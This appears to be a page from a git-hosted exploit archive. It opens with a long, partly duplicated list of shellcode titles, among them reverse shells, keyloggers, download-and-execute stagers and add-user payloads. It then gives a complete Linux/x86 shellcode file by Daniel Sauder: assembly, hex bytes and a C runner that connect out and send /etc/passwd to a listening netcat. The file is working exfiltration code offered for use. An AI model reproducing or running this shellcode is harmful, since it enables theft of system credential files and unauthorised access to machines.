Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)
Windows/x86 (.Net Framework) - Execute Native x86 Shellcode

Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)
Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)

Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)
Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)

Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Windows x86 - system(_systeminfo_) Shellcode (224 bytes)
Windows XP < 10 - Download File + Execute Shellcode
Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)
Windows/x86 - system(systeminfo) Shellcode (224 bytes)
Windows (XP < 10) - Download File + Execute Shellcode
Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)

Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:10)  Xterm Shell Shellcode (68 bytes)
Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)
Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)
Windows/x86 - MessageBoxA Shellcode (242 bytes)
Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)

Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)

OSX/PPC - Stager Sock Find MSG_PEEK Shellcode
OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode

OSX/PPC - execve(/bin/sh) Shellcode
OSX/PPC - execve(/bin/sh) + Null-Free Shellcode

Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)
Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)
Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)
Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86 - Egghunter Shellcode (38 bytes)
Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)
Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)
Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)
Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)
Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)
Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)
Linux/x86 - Uzumaki Encryptor Shellcode (Generator)
Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)
Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)
Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)
Linux/x86 - Bind TCP Shell Shellcode (112 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)
Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)
Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)
Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)
Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)
Linux/x86 - execve() Using  JMP-FSTENV Shellcode (67 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)
Linux/x86 - shutdown -h now Shellcode (56 bytes)
Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)
Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)
Linux/x86 - execve() + ROT-7  Shellcode (Encoder/Decoder)  (74 bytes)
Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)
Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)
Windows/x86 - Create Admin User (X) Shellcode (304 bytes)
Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)
Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes)
Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes)
Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes)
Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes)
Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes)
Windows/x86 - Message Box + Null-Free Shellcode (140 bytes)
Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes)
Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes)
Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes)
Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)
Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes)
Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)
Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)
Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir Shellcode (25 bytes)
Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)
Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir() Shellcode (25 bytes)

Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Linux/x86-64 - Egghunter Shellcode (38 bytes)
Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)
Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)

Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)
Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)

Windows x86 - Hide Console Window Shellcode (182 bytes)
Windows/x86 - Hide Console Window Shellcode (182 bytes)

Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes)
Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)

Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)
Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)

Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) +  Egghunter Using sys_access() Shellcode (49 bytes)

Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)
Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)

Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)

Windows 10 x64 - Egghunter Shellcode (45 bytes)
Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)

Linux/x86 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)

Windows x86/x64 - cmd.exe Shellcode (718 bytes)
Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)

Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)

Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)
Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)

Windows x64 - API Hooking Shellcode (117 bytes)
Windows/x86-64 - API Hooking Shellcode (117 bytes)
2018-01-19 05:01:43 +00:00

98 lines
No EOL
2 KiB
C
Raw Blame History

/*
; Author: Daniel Sauder
; Website: http://govolution.wordpress.com/about
; License http://creativecommons.org/licenses/by-sa/3.0/
; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345.
; The file can be recieved using netcat:
; $ nc -l 127.1.1.1 12345
section .text
global _start
_start:
; socket
push BYTE 0x66 ; socketcall 102
pop eax
xor ebx, ebx
inc ebx
xor edx, edx
push edx
push BYTE 0x1
push BYTE 0x2
mov ecx, esp
int 0x80
mov esi, eax
; connect
push BYTE 0x66
pop eax
inc ebx
push DWORD 0x0101017f ;127.1.1.1
push WORD 0x3930 ; Port 12345
push WORD bx
mov ecx, esp
push BYTE 16
push ecx
push esi
mov ecx, esp
inc ebx
int 0x80
; dup2
mov esi, eax
push BYTE 0x1
pop ecx
mov BYTE al, 0x3F
int 0x80
;read the file
jmp short call_shellcode
shellcode:
push 0x5
pop eax
pop ebx
xor ecx,ecx
int 0x80
mov ebx,eax
mov al,0x3
mov edi,esp
mov ecx,edi
xor edx,edx
mov dh,0xff
mov dl,0xff
int 0x80
mov edx,eax
push 0x4
pop eax
mov bl, 0x1
int 0x80
push 0x1
pop eax
inc ebx
int 0x80
call_shellcode:
call shellcode
message db "/etc/passwd"
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Reference in a new issue View git blame Copy permalink